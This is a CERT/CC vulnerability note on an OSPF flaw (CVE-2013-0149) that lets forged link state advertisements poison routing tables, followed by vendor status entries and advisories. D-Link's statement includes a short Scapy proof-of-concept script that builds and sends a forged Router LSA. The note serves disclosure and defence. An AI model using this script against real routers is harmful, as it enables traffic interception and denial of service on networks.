search menu icon-carat-right cmu-wordmark

CERT Coordination Center

Open Shortest Path First (OSPF) Protocol does not specify unique LSA lookup identifiers

Vulnerability Note VU#229804

Original Release Date: 2013-08-02 | Last Revised: 2013-12-06

Overview

The Open Shortest Path First (OSPF) protocol does not specify unique Link State Advertisement (LSA) lookup identifiers, which allow an attacker to intercept traffic or conduct a Denial of Service (DoS) attack.

Description

CWE-694: Use of Multiple Resources with a Duplicate Identifier

The OSPF protocol requires LSA's to be identified by: LS Type, Advertising Router, and Link State ID. However, during the routing table calculation phase, the specification states that a LSA is queried in the LSA database
using only the Link State ID. Since the Link State ID is used in the LSA database to identify a particular router, a malformed duplicate entry can cause unexpected and insecure implementation-specific behavior.

In some implementations, the vulnerability can allow an attacker to subvert the routing table of victim router by sending false link state advertisements on behalf of other routers. This subversion can cause the victim router
to drop the entire table (denial of service) or to re-route traffic on the network.

Impact

This vulnerability can allow an attacker to re-route traffic, compromising the confidentiality of the data, or to conduct a denial-of-service attack against a router, dropping all traffic.

Solution

Install Updates
The OSPF protocol is a popular interior routing protocol that is used by many devices and manufacturers. This vulnerability is implementation-specific, so some vendors may not be affected. The list below contains known affected or non-affected vendors. Please consult your network equipment vendor to confirm how they are affected by this vulnerability.

Vendor Information

229804
 
Affected   Unknown   Unaffected

Brocade

Notified:  June 13, 2013 Updated:  August 05, 2013

Status

  Affected

Vendor Statement

TECHNICAL SUPPORT BULLETIN

July 25, 2013

TSB 2013-165- A SEVERITY: Low – Informational

PRODUCTS AFFECTE D:
Brocade MLX Series running NetIron SW
Brocade NetIron XMR Series running NetIron SW
Brocade NetIron CER Series running NetIron SW
Brocade NetIron CES Series running NetIron SW
Brocade VDX Series running Network OS 3.x and later SW
Brocade FastIron Series running FastIron SW
Brocade ICX Series running FastIron SW
Brocade TurboIron Series running FastIron or TurboIron SW
Brocade BigIron RX Series running BigIron RX SW
Brocade ADX Series and JetCore Series running ServerIron SW
Brocade Vyatta vRouter
CORRECTED IN RELEASE:
See list of releases below.

BULLETIN OVERVIEW
A security vulnerability, US-CERT Ref VU#229804, has been identified in the OSPF protocol. This
vulnerability has a CVSS score of 9.3 and is documented in the National Vulnerability Database as
CVE-2013-0149. See http://nvd.nist.gov/home.cfm for details.

Brocade produces and publishes Technical Support Bulletins to OEMs, partners and customers that
have a direct, entitled, support relationship in place with Brocade

Please contact your primary service provider for further information regarding this topic and
applicability for your environment.

PROBLEM STATEMENT
A security vulnerability, US-CERT Ref VU#229804, has been identified in the OSPF protocol. This
vulnerability requires that the attacker already controls a router within the AS.

RISK ASSESSMENT
The listed products are exposed to this vulnerability in the OSPF protocol, where the attacker already
has control of a router in the AS. This vulnerability has a CVSS score of 9.3.

SYMPTOMS
An attacker who has gained control of a router within a given AS can arbitrarily poison the routing
tables of all other routers in the AS. This can facilitate traffic subversion, black hole, etc.
The attacker can cause attacks through a crafted illegal OSPF router LSA (type-1); where the link state
ID & router ID in the LSA is not same; leading to corruption of routing table in the routers.
The crafted Router LSA must come from a source IP of an OSPF peer; in other words, spoofing a
legitimate OSPF peer. OR the router LSA is sent in the interface where an OSPF peer is existing
already.

WORKAROUND
There is no workaround. However if users can physically secure their network/routers, the chance of
this attack is quite low.
The recommendations are:
a) Physically secure the access to network routers, and links between routers.
b) Only allow passive OSPF protocols on interfaces with user/host connections, (i.e. leaf
interfaces).
c) Enable OSPF MD5 authentication
This is not considered completely secure, but it should make the attack more difficult.

CORRECTIVE ACTION
See http://My.Brocade.com for the appropriate SW release(s) as listed below, please contact your
account team or Brocade Support if you have further questions.

Affected Products:
 Brocade MLX Series
 Brocade NetIron XMR Series
 Brocade NetIron CER Series
 Brocade NetIron CES Series

SW Releases with problem resolved
 NetIron 05.2.00k and later
 NetIron 05.3.00f and later
 NetIron 05.4.00e and later
 NetIron 05.5.00d and later
Reference Defect ID: 468326

Affected Products:
 Brocade VDX Series

SW Releases with problem resolved
 Network OS 3.0.1c and later
 Network OS 4.0.0a and later
Reference Defect ID: 466022

Affected Products:
 Brocade FastIron Series
 Brocade ICX Series
 Brocade TurboIron Series

SW Releases with problem resolved
 FastIron 7.2.02k and later
 FastIron 7.3.00g and later
 FastIron 07.4.00d and later
 FastIron 08.0.00b and later
Reference Defect ID: 466801

Affected Products:
 Brocade BigIron RX Series

SW Releases with problem resolved
 BigIron RX 2.7.02p and later
 BigIron RX 02.8.00f and later
 BigIron RX 02.9.00c and later
Reference Defect ID: 468497

Affected Products:
 Brocade ADX Series and JetCore Series

SW Releases with problem resolved
 ServerIron JetCore 10.2.02d
 ServerIron JetCore 11.0.00k
 ServerIron ADX 12.3.01k
 ServerIron ADX 12.4.00k
 ServerIron ADX 12.5.01a
Reference Defect ID (ADX): 469347
Reference Defect ID (JetCore): 111372

Affected Products:
 Brocade Vyatta vRouter

For customers running on Amazon Web
Services this problem has been resolved.
SW Releases with problem resolved
 Brocade Vyatta vRouter 6.6R1

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Check Point Software Technologies

Notified:  May 28, 2013 Updated:  October 16, 2013

Status

  Affected

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Vendor References

Cisco Systems, Inc.

Notified:  May 22, 2013 Updated:  August 05, 2013

Status

  Affected

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor Information

Cisco has provided patches for this vulnerability, please check the URL below for details.

Vendor References

D-Link Systems, Inc.

Notified:  May 28, 2013 Updated:  August 05, 2013

Status

  Affected

Vendor Statement

1.Advisory Information

Title: Open Shortest Path First (OSPF) Protocol does not specify unique LSA lookup identifiers
D-Link ID: DLINK-2013-VUL0213
Advisory URL: TBD prior to Aug. 1, 2013
Date published: August 1, 2013
Date of last update: 7/29/13 (will update on saving document)
Reported by: CERT
Release mode: Coordinated Release

2.Vulnerability Information
Class: CWE-694
Impact: Critical
Remotely Exploitable: Possible, but would require access via other product (s)
Locally Exploitable: Yes
CVE Name: CVE-2013-0149
3.Vulnerability Description
The Open Shortest Path First (OSPF) protocol does not specify unique Link State
Advertisement (LSA) lookup identifiers, which allow an attacker to intercept traffic or
conduct a Denial of Service (DoS) attack.

This vulnerability can allow an attacker to re-route traffic through their own router,
compromising the confidentiality of the data, or to conduct a Denial of Service attack
against a router, dropping all traffic.

4.Vulnerable Packages
The following is the list of known affected devices and the associated firmware
(confirmed by D-Link). This will be updated as needed if additional units effected.
1. DES-3810-28 – R2.20.B017 (HW Not available in the US)

5.VendorInformation, Solutions and Workarounds
D-Link distributes a number of devices which could potentially be affected by this
vulnerability; chiefly, any L3 managed switch that supports OSPF has the possibility of
being subject to this attack.

D-Link is working to reduce the potential impact of this vulnerability, which is a result of
an ambiguous standard. Currently we advise the following:

As always, adhering to best practices will be the strongest defense against attacks. As
long as your physical devices, networks, and protocols are secured, it will be very
difficult for an attacker to insert a rogue LSA to initiate this type of attack.

First, this vulnerability does not defeat cryptographic (MD5) authentication, we
recommend a strong MD5 authentication key as your best defense.
We also recommend that administrators enable the OSPF passive interface feature to
stop sending or receiving routing table updates on interfaces that do not participate in
OSPF.

Finally, we recommend that networks use MAC-based Access Control (MAC) to
authenticate devices before they are able to communicate with the network. The MAC
feature is a client-less design so there is no need to install extra software on a user’s
computer, and ensures that only devices on a whitelist will have access to the network.
When used in conjunction with common security best practices, it can help to strongly
limit the possible vectors of attack.

D-Link is monitoring the situation for an update to the standard that can be implemented
to protect potentially affected devices.

6.Credits
Dr. Gabi Nakibly - NEWRSC, Rafael - Advanced Defense Systems Ltd.
Eitan Menahem - Telekom Innovation Laboratories, Ben Gurion University
Ariel Waizel - Telekom Innovation Laboratories, Ben Gurion University
Prof. Yuval Elovici - Telekom Innovation Laboratories, Ben Gurion University
The publication of this advisory was not coordinated with forementioned

7.Technical Description / Proof of Concept Code

7.1.OSPF 𠇏ight Back” is triggered by LSAs with matching Router ID only, and so can
be evaded by using non matching Router ID and Link State ID on a rogue LSA. Routing
lookup uses only the Link State ID field, and so may, depending on implementation,
result in selecting the rogue LSA before the valid LSA.

scappy proof of concept attack script

attacker_source_ip = "192.168.13.1"
attacker_router_id = "192.168.18.1"
victim_destination_ip = "192.168.13.3"
victim_router_id = "192.168.37.3"
false_adv_router = "192.168.27.11"
seq_num = 0x80000004L
R3_FALSE_LSA = IP(src=attacker_source_ip, dst=victim_destination_ip) \
/OSPF_Hdr(src=attacker_router_id) \
/OSPF_LSUpd(lsalist=[ \
OSPF_Router_LSA(options=0x22, type=1, id=victim_router_id, adrouter=false_adv_router,
seq=seq_num, linklist=[ \
OSPF_Link(id="192.168.37.7", data="192.168.37.3", type=2, metric=1), \
OSPF_Link(id="192.168.13.3", data="192.168.13.3", type=2, metric=1), \
OSPF_Link(id="192.168.50.0", data="255.255.255.0", type=3, metric=3) \
])
])
send(R3_FALSE_LSA, iface="eth0")

8.ReportTimeline
• May 28, 2013 – Notification by Cert of the issue
• May 28, 2013 – Notify Qualified D-Link Resources of issue
• June 6, 2013 – Cert notified embargo date changed to July 30
• Jun 6, 2013 – D-Link Request Cert to resend details
• June 11, 2013 – D-Link receives details
• July 29, 2013 – Cert notified embargo date changed to Aug 1
• July 29, 2013 – D-Link Sends Vulnerability Response Report to Cert
• July 30, 2013 – D-Link Post Report for effected Products

9.References
[1] CVE-229804-2013.pdf – Owning the Routing Table Part II

10.AboutD-Link
D-Link is the global leader in connectivity for home, small business, mid- to large-sized enterprise
environments, and service providers. An award-winning designer, developer, and manufacturer, D-Link
implements and supports unified network solutions that integrate capabilities in switching, wireless,
broadband, storage, IP Surveillance, and cloud-based network management. For more information visit
www.dlink.com, or connect with D-Link on Facebook (www.facebook.com/dlink) and Twitter
(www.twitter.com/dlink).

11.Disclaimer
D-Link and the D-Link logo are trademarks or registered trademarks of D-Link Corporation or its
subsidiaries. All other third-party marks mentioned herein may be trademarks of their respective owners.
Copyright © 2013. D-Link. All Rights Reserved.

References

Authors:
Patrick Cline - Patrick.Cline@dlink.com
William Brown – William.Brown@dlink.com

Vendor Information

Please see DLINK-2013-VUL0213.

Enterasys Networks

Notified:  May 28, 2013 Updated:  August 19, 2013

Status

  Affected

Vendor Statement

Product Advisory Note - https://cp-enterasys.kb.net/article.aspx?article=15134&p=1

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Vendor References

Extreme Networks

Notified:  May 28, 2013 Updated:  July 30, 2013

Status

  Affected

Vendor Statement

Extreme networks' EXOS implementation of OSPF is susceptible to the vulnerability reported in VU#229804.

This vulnerability will be fixed in future EXOS release.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

IBM Corporation

Notified:  May 28, 2013 Updated:  August 05, 2013

Status

  Affected

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor Information

IBM has provided updates for multiple products, please check the URLs below for details.

Vendor References

Juniper Networks, Inc.

Notified:  May 10, 2013 Updated:  December 03, 2013

Status

  Affected

Vendor Statement

LEGACY ADVISORY ID:

PSN-2013-08-987

PRODUCT AFFECTED:
All Juniper Networks platforms running Junos Operating System software, JunosE Operating System software, and ScreenOS software

PROBLEM:
A vulnerability has been discovered in the OSPF (Open Shortest Path First) protocol that allows a remote attacker to insert, update, or delete routes in the OSPF database. Juniper has worked to provide fixes for all supported code that is vulnerable to this issue.

The issue lies in the OSPF protocol (RFC 2328: http://www.rfc-editor.org/rfc/rfc2328.txt). OSPF does not specify that the 'Link State ID' and 'Advertising Router' fields need to match when a router receives an OSPF link-state advertisement (LSA). This limitation of the protocol specification would allow for an attacker to inject false routes into the OSPF database. This issue doesn't exist if the OSPF configuration of a router is set to use MD5 Authentication, or if a filter is used to block external parties from sending OSPF link-state update (LSU) packets. This issue also does not apply to passive OSPF interfaces or interfaces that are not configured for OSPF.

This issue was discovered by an external security researcher.

No other Juniper Networks products or platforms are affected by this issue.

This issue has been assigned CVE-2013-0149.

SOLUTION:
Releases containing (or will contain) the fix specifically include: 13.1R3, 13.2X50-D10, 12.3R3, 12.2R5, 12.1R7, 12.1X45-D10, 12.1X44-D15, 11.4R8, 10.4R15, and all subsequent releases. In addition, all Junos OS software releases built on or after 2013-07-25 will also have fixed this specific issue.

Customers can confirm the build date of any Junos OS release by issuing the command 'show version detail'.

All JunosE software releases built on or after 2013-07-25 have fixed this specific issue. Please contact JTAC to request a patch or hotfix for fixes on all other supported releases of code.

Software updates to ScreenOS have been released to resolve this issue. Releases containing the fix include ScreenOS 5.4.0r28a, 6.2.0r17a, and 6.3.0r14a.

This issue is being tracked as PR 878639 (Junos), CQ95773 (JunosE), and PR 895456 (ScreenOS).

KB16765 - "In which releases are vulnerabilities fixed?" describes which release vulnerabilities are fixed as per our End of Engineering and End of Life support policies.

WORKAROUND:
Juniper recommends that customers use MD5 authentication when configuring OSPF. MD5 authentication completely mitigates this issue as the router will not accept an LSA without the correct MD5 auth value.

It is good security practice to limit the exploitable attack surface of critical infrastructure networking equipment. Use access lists or firewall filters on physical interfaces (not loopback) to limit access to the router via OSPF unless necessary.

Customers can request a hotfix for this issue on JunosE may do so by contacting JTAC.
IMPLEMENTATION:

RELATED LINKS:
KB16613: Overview of the Juniper Networks SIRT Monthly Security Bulletin Publication Process
KB16765: In which releases are vulnerabilities fixed?
KB16446: Common Vulnerability Scoring System (CVSS) and Juniper's Security Advisories.
Report a Vulnerability - How to Contact the Juniper Networks Security Incident Response Team
CVE-2013-0149

CVSS SCORE:
7.8 (AV:N/AC:M/Au:N/C:N/I:P/A:C)

RISK LEVEL:
High

RISK ASSESSMENT:
This issue could allow an remote attacker the ability to modify an OSPF database. For the issue to take place the attacker would need to have unfiltered access to an OSPF interface that is not using MD5 authentication. The attacker would be able to add routes, overwrite routes, and also clear the OSPF database. This attack could potentially allow an attacker to cause a denial of service or reroute traffic.

ACKNOWLEDGEMENTS:
Juniper SIRT would like to acknowledge and thank Gabi Nakibly for responsibly reporting this vulnerability to CERT/CC who coordinated the multi-vendor response.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Vendor References

NEC Corporation

Notified:  May 28, 2013 Updated:  September 10, 2013

Status

  Affected

Vendor Statement

We provide information on this issue at the following URL: http://jpn.nec.com/security-info/secinfo/nv13-006.html (only in Japanese)

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Vendor References

Oracle Corporation

Notified:  May 28, 2013 Updated:  October 16, 2013

Status

  Affected

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor Information

Affected products include: Oracle Sun Blade 6000 10GBE switched NEM 1.2, Sun Network 10GBE Switch 72P 1.2, Oracle Switch ES1-24 1.3. A patch is available at the following link.

Vendor References

Vyatta

Notified:  May 10, 2013 Updated:  August 05, 2013

Status

  Affected

Vendor Statement

TECHNICAL SUPPORT BULLETIN

July 25, 2013

TSB 2013-165- A SEVERITY: Low – Informational

PRODUCTS AFFECTED:
Brocade MLX Series running NetIron SW
Brocade NetIron XMR Series running NetIron SW
Brocade NetIron CER Series running NetIron SW
Brocade NetIron CES Series running NetIron SW
Brocade VDX Series running Network OS 3.x and later SW
Brocade FastIron Series running FastIron SW
Brocade ICX Series running FastIron SW
Brocade TurboIron Series running FastIron or TurboIron SW
Brocade BigIron RX Series running BigIron RX SW
Brocade ADX Series and JetCore Series running ServerIron SW
Brocade Vyatta vRouter
CORRECTED IN RELEASE:
See list of releases below.

BULLETIN OVERVIEW
A security vulnerability, US-CERT Ref VU#229804, has been identified in the OSPF protocol. This
vulnerability has a CVSS score of 9.3 and is documented in the National Vulnerability Database as
CVE-2013-0149. See http://nvd.nist.gov/home.cfm for details.

Brocade produces and publishes Technical Support Bulletins to OEMs, partners and customers that
have a direct, entitled, support relationship in place with Brocade

Please contact your primary service provider for further information regarding this topic and
applicability for your environment.

PROBLEM STATEMENT
A security vulnerability, US-CERT Ref VU#229804, has been identified in the OSPF protocol. This
vulnerability requires that the attacker already controls a router within the AS.

RISK ASSESSMENT
The listed products are exposed to this vulnerability in the OSPF protocol, where the attacker already
has control of a router in the AS. This vulnerability has a CVSS score of 9.3.

SYMPTOMS
An attacker who has gained control of a router within a given AS can arbitrarily poison the routing
tables of all other routers in the AS. This can facilitate traffic subversion, black hole, etc.
The attacker can cause attacks through a crafted illegal OSPF router LSA (type-1); where the link state
ID & router ID in the LSA is not same; leading to corruption of routing table in the routers.
The crafted Router LSA must come from a source IP of an OSPF peer; in other words, spoofing a
legitimate OSPF peer. OR the router LSA is sent in the interface where an OSPF peer is existing
already.

WORKAROUND
There is no workaround. However if users can physically secure their network/routers, the chance of
this attack is quite low.
The recommendations are:
a) Physically secure the access to network routers, and links between routers.
b) Only allow passive OSPF protocols on interfaces with user/host connections, (i.e. leaf
interfaces).
c) Enable OSPF MD5 authentication
This is not considered completely secure, but it should make the attack more difficult.

CORRECTIVE ACTION
See http://My.Brocade.com for the appropriate SW release(s) as listed below, please contact your
account team or Brocade Support if you have further questions.

Affected Products:
 Brocade MLX Series
 Brocade NetIron XMR Series
 Brocade NetIron CER Series
 Brocade NetIron CES Series

SW Releases with problem resolved
 NetIron 05.2.00k and later
 NetIron 05.3.00f and later
 NetIron 05.4.00e and later
 NetIron 05.5.00d and later
Reference Defect ID: 468326

Affected Products:
 Brocade VDX Series

SW Releases with problem resolved
 Network OS 3.0.1c and later
 Network OS 4.0.0a and later
Reference Defect ID: 466022

Affected Products:
 Brocade FastIron Series
 Brocade ICX Series
 Brocade TurboIron Series

SW Releases with problem resolved
 FastIron 7.2.02k and later
 FastIron 7.3.00g and later
 FastIron 07.4.00d and later
 FastIron 08.0.00b and later
Reference Defect ID: 466801

Affected Products:
 Brocade BigIron RX Series

SW Releases with problem resolved
 BigIron RX 2.7.02p and later
 BigIron RX 02.8.00f and later
 BigIron RX 02.9.00c and later
Reference Defect ID: 468497

Affected Products:
 Brocade ADX Series and JetCore Series

SW Releases with problem resolved
 ServerIron JetCore 10.2.02d
 ServerIron JetCore 11.0.00k
 ServerIron ADX 12.3.01k
 ServerIron ADX 12.4.00k
 ServerIron ADX 12.5.01a
Reference Defect ID (ADX): 469347
Reference Defect ID (JetCore): 111372

Affected Products:
 Brocade Vyatta vRouter

For customers running on Amazon Web
Services this problem has been resolved.
SW Releases with problem resolved
 Brocade Vyatta vRouter 6.6R1

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Yamaha Corporation

Notified:  May 28, 2013 Updated:  August 05, 2013

Status

  Affected

Vendor Statement

Yamaha corporation provides information on this issue at the following URL. (Japanese only)

http://www.rtpro.yamaha.co.jp/RT/FAQ/Security/VU96465452.html

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Vendor References

ACME Packet

Notified:  May 28, 2013 Updated:  July 18, 2013

Status

  Not Affected

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Buffalo Inc

Notified:  May 30, 2013 Updated:  September 12, 2013

Status

  Not Affected

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Fortinet, Inc.

Notified:  May 28, 2013 Updated:  August 19, 2013

Status

  Not Affected

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

FreeBSD Project

Notified:  May 28, 2013 Updated:  July 18, 2013

Status

  Not Affected

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Global Technology Associates, Inc.

Notified:  May 28, 2013 Updated:  July 30, 2013

Statement Date:   July 30, 2013

Status

  Not Affected

Vendor Statement

GTA's GB-OS based firewalls are not affected by this (VU#229804
- OSPF) vulnerability.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Hitachi

Notified:  May 28, 2013 Updated:  July 31, 2013

Status

  Not Affected

Vendor Statement

Hitachi Information for VU#229804

AlaxalA AX series
(AX8600R/AX6000S/AX3800S/AX3600S/AX2500S/AX2200S/AX1200S/AX7800S/AX7800R)
are not vulnerable to this issue.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Huawei Technologies

Notified:  May 10, 2013 Updated:  August 22, 2013

Status

  Not Affected

Vendor Statement

Huawei network devices are not affected by this (VU#229804- OSPF)
vulnerability.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Intel Corporation

Notified:  May 22, 2013 Updated:  July 18, 2013

Status

  Not Affected

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

McAfee

Notified:  May 28, 2013 Updated:  October 16, 2013

Status

  Not Affected

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Vendor References

Palo Alto Networks

Notified:  May 28, 2013 Updated:  July 18, 2013

Status

  Not Affected

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Quagga

Notified:  May 23, 2013 Updated:  August 05, 2013

Status

  Not Affected

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Addendum

Quagga is not affected by this vulnerability but the vendor has provided a patch to prevent rebroadcasting of malformed LSAs.

If you have feedback, comments, or additional information about this vulnerability, please send us email.

VMware

Notified:  May 28, 2013 Updated:  July 18, 2013

Status

  Not Affected

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Watchguard Technologies, Inc.

Notified:  May 28, 2013 Updated:  August 06, 2013

Status

  Not Affected

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

eSoft, Inc.

Notified:  May 28, 2013 Updated:  July 30, 2013

Status

  Not Affected

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

ACCESS

Notified:  May 28, 2013 Updated:  May 28, 2013

Status

  Unknown

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor References

    AT&T

    Notified:  June 06, 2013 Updated:  June 06, 2013

    Status

      Unknown

    Vendor Statement

    No statement is currently available from the vendor regarding this vulnerability.

    Vendor References

      Alcatel-Lucent

      Notified:  May 10, 2013 Updated:  May 10, 2013

      Status

        Unknown

      Vendor Statement

      No statement is currently available from the vendor regarding this vulnerability.

      Vendor References

        Apple Inc.

        Notified:  May 28, 2013 Updated:  May 28, 2013

        Status

          Unknown

        Vendor Statement

        No statement is currently available from the vendor regarding this vulnerability.

        Vendor References

          Avaya, Inc.

          Notified:  May 28, 2013 Updated:  May 28, 2013

          Status

            Unknown

          Vendor Statement

          No statement is currently available from the vendor regarding this vulnerability.

          Vendor References

            Barracuda Networks

            Notified:  May 28, 2013 Updated:  May 28, 2013

            Status

              Unknown

            Vendor Statement

            No statement is currently available from the vendor regarding this vulnerability.

            Vendor References

              Belkin, Inc.

              Notified:  May 28, 2013 Updated:  May 28, 2013

              Status

                Unknown

              Vendor Statement

              No statement is currently available from the vendor regarding this vulnerability.

              Vendor References

                Blue Coat Systems

                Notified:  June 06, 2013 Updated:  June 06, 2013

                Status

                  Unknown

                Vendor Statement

                No statement is currently available from the vendor regarding this vulnerability.

                Vendor References

                  Borderware Technologies

                  Notified:  May 28, 2013 Updated:  May 28, 2013

                  Status

                    Unknown

                  Vendor Statement

                  No statement is currently available from the vendor regarding this vulnerability.

                  Vendor References

                    CA Technologies

                    Notified:  May 28, 2013 Updated:  May 28, 2013

                    Status

                      Unknown

                    Vendor Statement

                    No statement is currently available from the vendor regarding this vulnerability.

                    Vendor References

                      Charlotte's Web Networks

                      Notified:  May 28, 2013 Updated:  May 28, 2013

                      Status

                        Unknown

                      Vendor Statement

                      No statement is currently available from the vendor regarding this vulnerability.

                      Vendor References

                        Computer Emergency Response Team Australia

                        Notified:  May 30, 2013 Updated:  May 30, 2013

                        Status

                          Unknown

                        Vendor Statement

                        No statement is currently available from the vendor regarding this vulnerability.

                        Vendor References

                          Conectiva Inc.

                          Notified:  May 28, 2013 Updated:  May 28, 2013

                          Status

                            Unknown

                          Vendor Statement

                          No statement is currently available from the vendor regarding this vulnerability.

                          Vendor References

                            Cray Inc.

                            Notified:  May 28, 2013 Updated:  May 28, 2013

                            Status

                              Unknown

                            Vendor Statement

                            No statement is currently available from the vendor regarding this vulnerability.

                            Vendor References

                              Debian GNU/Linux

                              Notified:  May 28, 2013 Updated:  May 28, 2013

                              Status

                                Unknown

                              Vendor Statement

                              No statement is currently available from the vendor regarding this vulnerability.

                              Vendor References

                                Dell Computer Corporation, Inc.

                                Notified:  May 10, 2013 Updated:  May 10, 2013

                                Status

                                  Unknown

                                Vendor Statement

                                No statement is currently available from the vendor regarding this vulnerability.

                                Vendor References

                                  DragonFly BSD Project

                                  Notified:  May 28, 2013 Updated:  May 28, 2013

                                  Status

                                    Unknown

                                  Vendor Statement

                                  No statement is currently available from the vendor regarding this vulnerability.

                                  Vendor References

                                    EMC Corporation

                                    Notified:  May 28, 2013 Updated:  May 28, 2013

                                    Status

                                      Unknown

                                    Vendor Statement

                                    No statement is currently available from the vendor regarding this vulnerability.

                                    Vendor References

                                      Engarde Secure Linux

                                      Notified:  May 28, 2013 Updated:  May 28, 2013

                                      Status

                                        Unknown

                                      Vendor Statement

                                      No statement is currently available from the vendor regarding this vulnerability.

                                      Vendor References

                                        Ericsson

                                        Notified:  June 06, 2013 Updated:  June 06, 2013

                                        Status

                                          Unknown

                                        Vendor Statement

                                        No statement is currently available from the vendor regarding this vulnerability.

                                        Vendor References

                                          F5 Networks, Inc.

                                          Notified:  May 28, 2013 Updated:  May 28, 2013

                                          Status

                                            Unknown

                                          Vendor Statement

                                          No statement is currently available from the vendor regarding this vulnerability.

                                          Vendor References

                                            Fedora Project

                                            Notified:  May 28, 2013 Updated:  May 28, 2013

                                            Status

                                              Unknown

                                            Vendor Statement

                                            No statement is currently available from the vendor regarding this vulnerability.

                                            Vendor References

                                              Force10 Networks, Inc.

                                              Notified:  May 28, 2013 Updated:  May 28, 2013

                                              Status

                                                Unknown

                                              Vendor Statement

                                              No statement is currently available from the vendor regarding this vulnerability.

                                              Vendor References

                                                Fujitsu

                                                Notified:  May 28, 2013 Updated:  May 28, 2013

                                                Status

                                                  Unknown

                                                Vendor Statement

                                                No statement is currently available from the vendor regarding this vulnerability.

                                                Vendor References

                                                  Gentoo Linux

                                                  Notified:  June 06, 2013 Updated:  June 06, 2013

                                                  Status

                                                    Unknown

                                                  Vendor Statement

                                                  No statement is currently available from the vendor regarding this vulnerability.

                                                  Vendor References

                                                    Google

                                                    Notified:  May 28, 2013 Updated:  May 28, 2013

                                                    Status

                                                      Unknown

                                                    Vendor Statement

                                                    No statement is currently available from the vendor regarding this vulnerability.

                                                    Vendor References

                                                      Hewlett-Packard Company

                                                      Notified:  May 10, 2013 Updated:  May 10, 2013

                                                      Status

                                                        Unknown

                                                      Vendor Statement

                                                      No statement is currently available from the vendor regarding this vulnerability.

                                                      Vendor References

                                                        IBM Corporation (zseries)

                                                        Notified:  May 28, 2013 Updated:  May 28, 2013

                                                        Status

                                                          Unknown

                                                        Vendor Statement

                                                        No statement is currently available from the vendor regarding this vulnerability.

                                                        Vendor References

                                                          IBM eServer

                                                          Notified:  May 28, 2013 Updated:  May 28, 2013

                                                          Status

                                                            Unknown

                                                          Vendor Statement

                                                          No statement is currently available from the vendor regarding this vulnerability.

                                                          Vendor References

                                                            IP Infusion, Inc.

                                                            Notified:  May 28, 2013 Updated:  May 28, 2013

                                                            Status

                                                              Unknown

                                                            Vendor Statement

                                                            No statement is currently available from the vendor regarding this vulnerability.

                                                            Vendor References

                                                              Infoblox

                                                              Notified:  May 28, 2013 Updated:  May 28, 2013

                                                              Status

                                                                Unknown

                                                              Vendor Statement

                                                              No statement is currently available from the vendor regarding this vulnerability.

                                                              Vendor References

                                                                Internet Security Systems, Inc.

                                                                Notified:  May 28, 2013 Updated:  May 28, 2013

                                                                Status

                                                                  Unknown

                                                                Vendor Statement

                                                                No statement is currently available from the vendor regarding this vulnerability.

                                                                Vendor References

                                                                  Intoto

                                                                  Notified:  May 28, 2013 Updated:  May 28, 2013

                                                                  Status

                                                                    Unknown

                                                                  Vendor Statement

                                                                  No statement is currently available from the vendor regarding this vulnerability.

                                                                  Vendor References

                                                                    Mandriva S. A.

                                                                    Notified:  May 28, 2013 Updated:  May 28, 2013

                                                                    Status

                                                                      Unknown

                                                                    Vendor Statement

                                                                    No statement is currently available from the vendor regarding this vulnerability.

                                                                    Vendor References

                                                                      Mellanox Technologies

                                                                      Notified:  July 10, 2013 Updated:  July 10, 2013

                                                                      Status

                                                                        Unknown

                                                                      Vendor Statement

                                                                      No statement is currently available from the vendor regarding this vulnerability.

                                                                      Vendor References

                                                                        Microsoft Corporation

                                                                        Notified:  May 28, 2013 Updated:  May 28, 2013

                                                                        Status

                                                                          Unknown

                                                                        Vendor Statement

                                                                        No statement is currently available from the vendor regarding this vulnerability.

                                                                        Vendor References

                                                                          MontaVista Software, Inc.

                                                                          Notified:  May 28, 2013 Updated:  May 28, 2013

                                                                          Status

                                                                            Unknown

                                                                          Vendor Statement

                                                                          No statement is currently available from the vendor regarding this vulnerability.

                                                                          Vendor References

                                                                            NetApp

                                                                            Notified:  May 28, 2013 Updated:  May 28, 2013

                                                                            Status

                                                                              Unknown

                                                                            Vendor Statement

                                                                            No statement is currently available from the vendor regarding this vulnerability.

                                                                            Vendor References

                                                                              NetBSD

                                                                              Notified:  May 28, 2013 Updated:  May 28, 2013

                                                                              Status

                                                                                Unknown

                                                                              Vendor Statement

                                                                              No statement is currently available from the vendor regarding this vulnerability.

                                                                              Vendor References

                                                                                Nokia

